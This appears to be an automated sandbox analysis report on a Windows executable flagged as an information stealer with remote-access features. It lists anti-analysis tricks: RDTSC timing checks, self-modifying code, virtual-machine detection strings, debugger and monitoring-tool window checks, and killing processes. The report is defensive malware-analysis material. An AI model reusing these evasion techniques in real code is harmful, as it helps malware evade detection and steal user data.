              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC7D5 second address: 8DC814 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE4C10F4F66h 0x00000008 jc 00007FE4C10F4F66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE4C10F4F73h 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 pop edi 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push ecx 0x0000001d jmp 00007FE4C10F4F73h 0x00000022 pop ecx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC814 second address: 8DC81E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FE4C1200286h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DC81E second address: 8DC82E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007FE4C10F4F6Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD0E2 second address: 8DD0E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD0E6 second address: 8DD126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 jmp 00007FE4C10F4F74h 0x0000000d pushad 0x0000000e jmp 00007FE4C10F4F6Ah 0x00000013 jmp 00007FE4C10F4F6Eh 0x00000018 popad 0x00000019 jc 00007FE4C10F4F6Eh 0x0000001f push edx 0x00000020 pop edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DD126 second address: 8DD132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE4C1200297h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E197C second address: 8E1982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1A29 second address: 8E1A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1A2D second address: 8E1A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edi 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1A3B second address: 8E1AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FE4C1200286h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jmp 00007FE4C1200294h 0x00000014 push 00000004h 0x00000016 call 00007FE4C1200290h 0x0000001b pushad 0x0000001c mov bx, 9AD8h 0x00000020 mov dx, 77A0h 0x00000024 popad 0x00000025 pop edx 0x00000026 mov dword ptr [ebp+122D3779h], ebx 0x0000002c call 00007FE4C1200289h 0x00000031 push ecx 0x00000032 jmp 00007FE4C1200291h 0x00000037 pop ecx 0x00000038 push eax 0x00000039 pushad 0x0000003a pushad 0x0000003b push ebx 0x0000003c pop ebx 0x0000003d push esi 0x0000003e pop esi 0x0000003f popad 0x00000040 je 00007FE4C1200288h 0x00000046 pushad 0x00000047 popad 0x00000048 popad 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d jmp 00007FE4C120028Ah 0x00000052 mov eax, dword ptr [eax] 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1AC4 second address: 8E1AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1AC8 second address: 8E1ACC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E1ACC second address: 8E1AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E34E7 second address: 8E350F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FE4C120028Ch 0x0000000d jmp 00007FE4C120028Bh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E350F second address: 8E3515 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3515 second address: 8E351A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E309C second address: 8E30A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30A2 second address: 8E30A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30A6 second address: 8E30D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE4C10F4F78h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FE4C10F4F75h 0x00000011 jmp 00007FE4C10F4F6Dh 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E30D9 second address: 8E30DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40272 second address: 4F40278 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40278 second address: 4F4028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov di, 0432h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov cx, 3471h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40326 second address: 4F4032A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F4032A second address: 4F40330 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40330 second address: 4F40370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d mov eax, ebx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FE4C10F4F6Fh 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 push ecx 0x0000001a mov esi, edx 0x0000001c pop edx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40370 second address: 4F40374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F40374 second address: 4F40386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE4C10F4F6Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 64F8DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 64F9B7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 81CACF instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 808722 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 87DFCA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision
Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetSystemTime,DecisionNodes
Source: C:\Users\user\Desktop\file.exe | API coverage: 4.8 %
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00413910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00411250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00411269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00414B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00412390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0041D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_004016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00421BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00421BF0
              Source: file.exe, file.exe, 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.1522326773.000000000101C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1522326773.0000000000FE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25971
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25979
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25824
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25843
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

Source: C:\Users\user\Desktop\file.exe, thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe, open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe, open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe, open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe, open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe, open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe, open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe, open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe, open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe, file opened: NTICE
Source: C:\Users\user\Desktop\file.exe, file opened: SICE
Source: C:\Users\user\Desktop\file.exe, file opened: SIWVID
Source: C:\Users\user\Desktop\file.exe, process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe, process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe, process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00404A60: VirtualProtect 00000000,00000004,00000100,?
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00426390: GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00426390: mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00422A40: GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: all processes, thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe, memory protected: page guard

              HIPS / PFW / Operating System Protection Evasion

Source: Yara match, file source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00424610: CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle
Source: C:\Users\user\Desktop\file.exe, code function 0_2_004246A0: CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle
Source: file.exe, file.exe, 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp, binary or memory string: XProgram Manager
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00422D60: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree
Source: C:\Users\user\Desktop\file.exe, queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00422B60: GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00422A40: GetProcessHeap,RtlAllocateHeap,GetUserNameA
Source: C:\Users\user\Desktop\file.exe, code function 0_2_00422C10: GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

              Stealing of Sensitive Information

Source: Yara match, file source: 00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
Source: Yara match, file source: dump.pcap, type: PCAP

              Remote Access Functionality

Source: Yara match, file source: 00000000.00000003.1480967160.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match, file source: 00000000.00000002.1522326773.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: file.exe PID: 6524, type: MEMORYSTR
Source: Yara match, file source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (a number in front of a technique is the count of matching signatures; cells without a number had no matching signature)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
